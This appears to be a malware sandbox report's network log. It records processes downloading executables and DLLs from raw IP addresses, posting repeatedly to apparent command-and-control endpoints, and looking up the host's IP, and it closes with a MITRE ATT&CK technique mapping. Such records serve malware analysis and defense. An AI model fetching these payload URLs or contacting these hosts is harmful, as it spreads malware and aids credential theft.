
Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 13 Oct 2023 04:19:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

js.monitor.azure.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.monitor.azure.com

IN A

Response

js.monitor.azure.com

IN CNAME

aijscdn2.azureedge.net

aijscdn2.azureedge.net

IN CNAME

aijscdn2.afd.azureedge.net

aijscdn2.afd.azureedge.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
DNS

js.monitor.azure.com

msedge.exe

Remote address:

8.8.8.8:53

Request

js.monitor.azure.com

IN A

Response

js.monitor.azure.com

IN CNAME

aijscdn2.azureedge.net

aijscdn2.azureedge.net

IN CNAME

aijscdn2.afd.azureedge.net

aijscdn2.afd.azureedge.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
DNS

wcpstatic.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

wcpstatic.microsoft.com

IN A

Response

wcpstatic.microsoft.com

IN CNAME

consentdeliveryfd.azurefd.net

consentdeliveryfd.azurefd.net

IN CNAME

firstparty-azurefd-prod.trafficmanager.net

firstparty-azurefd-prod.trafficmanager.net

IN CNAME

dual.part-0039.t-0009.t-msedge.net

dual.part-0039.t-0009.t-msedge.net

IN CNAME

part-0039.t-0009.t-msedge.net

part-0039.t-0009.t-msedge.net

IN A

13.107.246.67

part-0039.t-0009.t-msedge.net

IN A

13.107.213.67
GET

https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

msedge.exe

Remote address:

13.107.246.67:443

Request

GET /mscc/lib/v2/wcp-consent.js HTTP/2.0
host: wcpstatic.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: max-age=43200
content-length: 81726
content-type: application/javascript
content-encoding: gzip
content-md5: X1JOIM5h9UISVFS6+GfEew==
last-modified: Wed, 24 Aug 2022 17:34:36 GMT
age: 23912
etag: 0x8DA85F6EA62BF74
vary: Accept-Encoding
access-control-allow-origin: *
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
x-cache: CONFIG_NOCACHE
x-ms-blob-type: BlockBlob
x-ms-lease-status: unlocked
x-ms-request-id: 9c7279a3-401e-0007-2954-fde67d000000
x-ms-version: 2009-09-19
x-azure-ref: 0VsUoZQAAAABfltqHemO+S4Md4Cg71z24QU1TMDRFREdFMTkwOQAzOWI0NjE1Ny1jYjllLTQ5YjctYTY1YS04NzIyYTNmODI0ZTQ=
date: Fri, 13 Oct 2023 04:19:33 GMT
DNS

67.246.107.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.246.107.13.in-addr.arpa

IN PTR

Response
DNS

api.ip.sb

8C58.exe

Remote address:

8.8.8.8:53

Request

api.ip.sb

IN A

Response

api.ip.sb

IN CNAME

api.ip.sb.cdn.cloudflare.net

api.ip.sb.cdn.cloudflare.net

IN A

172.67.75.172

api.ip.sb.cdn.cloudflare.net

IN A

104.26.12.31

api.ip.sb.cdn.cloudflare.net

IN A

104.26.13.31
DNS

mscom.demdex.net

msedge.exe

Remote address:

8.8.8.8:53

Request

mscom.demdex.net

IN A

Response

mscom.demdex.net

IN CNAME

gslb-2.demdex.net

gslb-2.demdex.net

IN CNAME

edge-irl1.demdex.net

edge-irl1.demdex.net

IN CNAME

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.254.109.178

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.255.132.0

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

34.254.70.163

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

63.33.121.220

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

52.210.175.198

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

63.35.31.5

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

52.17.168.91

dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com

IN A

46.51.199.218
DNS

microsoftmscompoc.tt.omtrdc.net

msedge.exe

Remote address:

8.8.8.8:53

Request

microsoftmscompoc.tt.omtrdc.net

IN A

Response

microsoftmscompoc.tt.omtrdc.net

IN CNAME

adobetarget.data.adobedc.net

adobetarget.data.adobedc.net

IN A

66.235.152.115

adobetarget.data.adobedc.net

IN A

66.235.152.126

adobetarget.data.adobedc.net

IN A

66.235.152.107

adobetarget.data.adobedc.net

IN A

66.235.152.143

adobetarget.data.adobedc.net

IN A

66.235.152.113

adobetarget.data.adobedc.net

IN A

66.235.152.152
DNS

target.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

target.microsoft.com

IN A

Response

target.microsoft.com

IN CNAME

microsoftmscompoc.tt.omtrdc.net

microsoftmscompoc.tt.omtrdc.net

IN CNAME

adobetarget.data.adobedc.net

adobetarget.data.adobedc.net

IN A

66.235.152.107

adobetarget.data.adobedc.net

IN A

66.235.152.143

adobetarget.data.adobedc.net

IN A

66.235.152.113

adobetarget.data.adobedc.net

IN A

66.235.152.152

adobetarget.data.adobedc.net

IN A

66.235.152.115

adobetarget.data.adobedc.net

IN A

66.235.152.126
GET

https://api.ip.sb/geoip

7C48.exe

Remote address:

172.67.75.172:443

Request

GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 13 Oct 2023 04:19:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
vary: Accept-Encoding
vary: Accept-Encoding
Cache-Control: no-cache
access-control-allow-origin: *
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LMzB%2Fhvdj%2B9T3UfwIxlCSlO4HhSaxC%2Bj%2BJcrXHHkAW07umiry9eb2oyRA%2Fj3YBw1GMzbMN2VpCP8bSUmj37DXEyo9fHKhWSLi0SCBpjkRiFPwFi1Rn56LNCsPA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8154c924a9bcb909-AMS
alt-svc: h3=":443"; ma=86400
DNS

178.109.254.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

178.109.254.34.in-addr.arpa

IN PTR

Response

178.109.254.34.in-addr.arpa

IN PTR

ec2-34-254-109-178 eu-west-1compute amazonawscom
GET

https://api.ip.sb/ip

8C58.exe

Remote address:

172.67.75.172:443

Request

GET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 13 Oct 2023 04:19:40 GMT
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2YVUFWbjlAwlXNXxER2yY4WxsRf0nwJQeScOPZuQUeAcjjh0applshtq4YCqITHi70eZJWjVaYJoplVmw%2FuDBjwzA%2BggRBQLeFGXkX%2FJhz7rrSBT6thnjwEARA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8154c9250e060e87-AMS
alt-svc: h3=":443"; ma=86400
DNS

172.75.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.75.67.172.in-addr.arpa

IN PTR

Response
GET

http://77.91.124.1/theme/Plugins/cred64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/cred64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 404 Not Found

Date: Fri, 13 Oct 2023 04:20:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
GET

http://77.91.124.1/theme/Plugins/clip64.dll

explothe.exe

Remote address:

77.91.124.1:80

Request

GET /theme/Plugins/clip64.dll HTTP/1.1
Host: 77.91.124.1

Response

HTTP/1.1 200 OK

Date: Fri, 13 Oct 2023 04:20:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 30 Sep 2023 10:50:50 GMT
ETag: "16400-60691507c5cc0"
Accept-Ranges: bytes
Content-Length: 91136
Content-Type: application/x-msdos-program
DNS

26.178.89.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.178.89.13.in-addr.arpa

IN PTR

Response
DNS

9.57.101.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

9.57.101.20.in-addr.arpa

IN PTR

Response

204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4

tls, http2

7.9kB
203.4kB
157
154

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239317301307_1ODPY4XEGGUMIF3D3&pid=21.2&w=1920&h=1080&c=4

HTTP Response

200
77.91.68.29:80

http://77.91.68.29/fks/

http

159.5kB
3.9MB
2665
2829

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404

HTTP Request

POST http://77.91.68.29/fks/

HTTP Response

404
77.91.68.52:80

http://77.91.68.52/fuza/3.bat

http

435 B
592 B
6
5

HTTP Request

GET http://77.91.68.52/fuza/3.bat

HTTP Response

200
5.42.65.80:80

http://5.42.65.80/rinkas.exe

http

5.8kB
209.5kB
109
161

HTTP Request

GET http://5.42.65.80/rinkas.exe

HTTP Response

200
185.216.70.222:80

http://185.216.70.222/trafico.exe

http

8.1kB
467.0kB
172
338

HTTP Request

GET http://185.216.70.222/trafico.exe

HTTP Response

200
171.22.28.213:80

http://171.22.28.213/1.exe

http

21.0kB
1.1MB
443
801

HTTP Request

GET http://171.22.28.213/1.exe

HTTP Response

200
5.42.92.211:80

http://5.42.92.211/loghub/master

http

4A92.exe

752 B
436 B
6
4

HTTP Request

POST http://5.42.92.211/loghub/master

HTTP Response

200
142.250.179.141:443

accounts.google.com

tls

msedge.exe

909 B
4.8kB
8
8
157.240.247.35:443

www.facebook.com

tls

msedge.exe

15.2kB
325.8kB
154
263
157.240.247.8:443

static.xx.fbcdn.net

tls

msedge.exe

897 B
2.6kB
7
5
157.240.247.8:443

static.xx.fbcdn.net

tls

msedge.exe

16.1kB
381.0kB
239
366
157.240.247.8:443

static.xx.fbcdn.net

tls

msedge.exe

897 B
2.6kB
7
5
157.240.247.8:443

static.xx.fbcdn.net

tls

msedge.exe

897 B
2.6kB
7
5
157.240.247.8:443

static.xx.fbcdn.net

tls

msedge.exe

897 B
2.6kB
7
5
157.240.247.8:443

static.xx.fbcdn.net

tls

msedge.exe

897 B
2.6kB
7
5
157.240.221.35:443

facebook.com

tls, http2

msedge.exe

949 B
828 B
8
8
157.240.221.35:443

facebook.com

tls

msedge.exe

1.8kB
4.0kB
15
14
157.240.221.35:443

fbcdn.net

tls

msedge.exe

1.7kB
4.1kB
14
16
77.91.124.1:80

http://77.91.124.1/theme/index.php

http

explothe.exe

512 B
365 B
6
5

HTTP Request

POST http://77.91.124.1/theme/index.php

HTTP Response

200
185.196.9.65:80

http

8C58.exe

476.7kB
13.2kB
350
146
77.91.124.55:19071

2va650IA.exe

260 B
5
185.216.70.238:37515

vbc.exe

435.1kB
13.9kB
347
182
171.22.28.202:16706

8959.exe

157.1kB
10.1kB
123
58
77.91.124.55:19071

AppLaunch.exe

260 B
5
85.209.176.171:80

http://85.209.176.171/

http

7C48.exe

1.2MB
18.7kB
895
317

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200

HTTP Request

POST http://85.209.176.171/

HTTP Response

200
104.85.2.139:443

https://learn.microsoft.com/media/logos/logo_net.svg

tls, http2

msedge.exe

29.6kB
1.2MB
540
914

HTTP Request

GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

301

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/edf5538c.site-ltr.css

HTTP Request

GET https://learn.microsoft.com/static/third-party/adobe-target/at-js/2.9.0/at.js

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/fddca500.index-docs.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=75BF.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

HTTP Response

200

HTTP Response

200

HTTP Response

301

HTTP Request

GET https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/toc.json

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/breadcrumb/toc.json

HTTP Request

GET https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png

HTTP Request

GET https://learn.microsoft.com/media/logos/logo_net.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

301

HTTP Request

GET https://learn.microsoft.com/en-us/banners/index.json

HTTP Response

200

HTTP Request

POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

HTTP Request

GET https://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/docons.28d69bd4.woff2

HTTP Request

GET https://learn.microsoft.com/en-us/media/logos/logo_net.svg

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/favicon.ico

HTTP Response

200

HTTP Request

POST https://learn.microsoft.com/api/recommendations/c89966aa-b155-c98a-2391-47e01d468236/batch

HTTP Response

200

HTTP Request

GET https://learn.microsoft.com/media/logos/logo_net.svg

HTTP Response

301
5.42.65.80:80

http://5.42.65.80/8bmeVwqx/index.php

http

oneetx.exe

468 B
367 B
5
4

HTTP Request

POST http://5.42.65.80/8bmeVwqx/index.php

HTTP Response

200
13.107.246.67:443

js.monitor.azure.com

tls

msedge.exe

3.5kB
7.3kB
12
11
13.107.246.67:443

https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

tls, http2

msedge.exe

4.0kB
91.3kB
62
77

HTTP Request

GET https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js

HTTP Response

200
34.254.109.178:443

mscom.demdex.net

tls

msedge.exe

886 B
4.8kB
8
9
13.107.246.67:443

js.monitor.azure.com

tls

msedge.exe

1.9kB
6.3kB
8
10
34.254.109.178:443

mscom.demdex.net

tls

msedge.exe

886 B
4.8kB
8
9
172.67.75.172:443

https://api.ip.sb/geoip

tls, http

7C48.exe

713 B
4.1kB
8
7

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
172.67.75.172:443

https://api.ip.sb/ip

tls, http

8C58.exe

710 B
3.8kB
8
7

HTTP Request

GET https://api.ip.sb/ip

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2va650IA.exe

260 B
5
77.91.124.1:80

http://77.91.124.1/theme/Plugins/clip64.dll

http

explothe.exe

3.7kB
94.8kB
74
73

HTTP Request

GET http://77.91.124.1/theme/Plugins/cred64.dll

HTTP Response

404

HTTP Request

GET http://77.91.124.1/theme/Plugins/clip64.dll

HTTP Response

200
77.91.124.55:19071

AppLaunch.exe

260 B
5
77.91.124.55:19071

2va650IA.exe

260 B
5

8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

22.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.160.190.20.in-addr.arpa
8.8.8.8:53

108.211.229.192.in-addr.arpa

dns

74 B
145 B
1
1

DNS Request

108.211.229.192.in-addr.arpa
8.8.8.8:53

9.228.82.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.228.82.20.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

183.59.114.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

183.59.114.20.in-addr.arpa
8.8.8.8:53

29.81.57.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

29.81.57.23.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

55.36.223.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

55.36.223.20.in-addr.arpa
8.8.8.8:53

1.208.79.178.in-addr.arpa

dns

71 B
116 B
1
1

DNS Request

1.208.79.178.in-addr.arpa
8.8.8.8:53

208.194.73.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

208.194.73.20.in-addr.arpa
8.8.8.8:53

29.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

29.68.91.77.in-addr.arpa
8.8.8.8:53

52.68.91.77.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

52.68.91.77.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

222.70.216.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

222.70.216.185.in-addr.arpa
8.8.8.8:53

213.28.22.171.in-addr.arpa

dns

72 B
133 B
1
1

DNS Request

213.28.22.171.in-addr.arpa
8.8.8.8:53

211.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

211.92.42.5.in-addr.arpa
8.8.8.8:53

accounts.google.com

dns

msedge.exe

65 B
81 B
1
1

DNS Request

accounts.google.com

DNS Response

142.250.179.141
8.8.8.8:53

www.facebook.com

dns

msedge.exe

62 B
107 B
1
1

DNS Request

www.facebook.com

DNS Response

157.240.247.35
8.8.8.8:53

141.179.250.142.in-addr.arpa

dns

74 B
113 B
1
1

DNS Request

141.179.250.142.in-addr.arpa
8.8.8.8:53

35.247.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.247.240.157.in-addr.arpa
8.8.8.8:53

static.xx.fbcdn.net

dns

msedge.exe

65 B
104 B
1
1

DNS Request

static.xx.fbcdn.net

DNS Response

157.240.247.8
8.8.8.8:53

8.247.240.157.in-addr.arpa

dns

72 B
116 B
1
1

DNS Request

8.247.240.157.in-addr.arpa
8.8.8.8:53

facebook.com

dns

msedge.exe

58 B
74 B
1
1

DNS Request

facebook.com

DNS Response

157.240.221.35
8.8.8.8:53

fbcdn.net

dns

msedge.exe

55 B
71 B
1
1

DNS Request

fbcdn.net

DNS Response

157.240.221.35
8.8.8.8:53

35.221.240.157.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

35.221.240.157.in-addr.arpa
8.8.8.8:53

fbsbx.com

dns

msedge.exe

275 B
5

DNS Request

fbsbx.com

DNS Request

fbsbx.com

DNS Request

fbsbx.com

DNS Request

fbsbx.com

DNS Request

fbsbx.com
224.0.0.251:5353

msedge.exe

576 B
9
8.8.8.8:53

1.124.91.77.in-addr.arpa

dns

70 B
83 B
1
1

DNS Request

1.124.91.77.in-addr.arpa
8.8.8.8:53

65.9.196.185.in-addr.arpa

dns

71 B
140 B
1
1

DNS Request

65.9.196.185.in-addr.arpa
8.8.8.8:53

238.70.216.185.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

238.70.216.185.in-addr.arpa
8.8.8.8:53

202.28.22.171.in-addr.arpa

dns

72 B
133 B
1
1

DNS Request

202.28.22.171.in-addr.arpa
8.8.8.8:53

171.176.209.85.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

171.176.209.85.in-addr.arpa
8.8.8.8:53

learn.microsoft.com

dns

msedge.exe

65 B
270 B
1
1

DNS Request

learn.microsoft.com

DNS Response

104.85.2.139
8.8.8.8:53

59.82.57.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

59.82.57.23.in-addr.arpa
8.8.8.8:53

139.2.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

139.2.85.104.in-addr.arpa
8.8.8.8:53

js.monitor.azure.com

dns

msedge.exe

132 B
546 B
2
2

DNS Request

js.monitor.azure.com

DNS Response

13.107.246.67

13.107.213.67

DNS Request

js.monitor.azure.com

DNS Response

13.107.246.67

13.107.213.67
8.8.8.8:53

wcpstatic.microsoft.com

dns

msedge.exe

69 B
256 B
1
1

DNS Request

wcpstatic.microsoft.com

DNS Response

13.107.246.67

13.107.213.67
8.8.8.8:53

67.246.107.13.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

67.246.107.13.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

8C58.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

172.67.75.172

104.26.12.31

104.26.13.31
8.8.8.8:53

mscom.demdex.net

dns

msedge.exe

62 B
300 B
1
1

DNS Request

mscom.demdex.net

DNS Response

34.254.109.178

34.255.132.0

34.254.70.163

63.33.121.220

52.210.175.198

63.35.31.5

52.17.168.91

46.51.199.218
8.8.8.8:53

microsoftmscompoc.tt.omtrdc.net

dns

msedge.exe

77 B
212 B
1
1

DNS Request

microsoftmscompoc.tt.omtrdc.net

DNS Response

66.235.152.115

66.235.152.126

66.235.152.107

66.235.152.143

66.235.152.113

66.235.152.152
8.8.8.8:53

target.microsoft.com

dns

msedge.exe

66 B
246 B
1
1

DNS Request

target.microsoft.com

DNS Response

66.235.152.107

66.235.152.143

66.235.152.113

66.235.152.152

66.235.152.115

66.235.152.126
8.8.8.8:53

178.109.254.34.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

178.109.254.34.in-addr.arpa
8.8.8.8:53

172.75.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

172.75.67.172.in-addr.arpa
8.8.8.8:53

26.178.89.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

26.178.89.13.in-addr.arpa
8.8.8.8:53

9.57.101.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

9.57.101.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery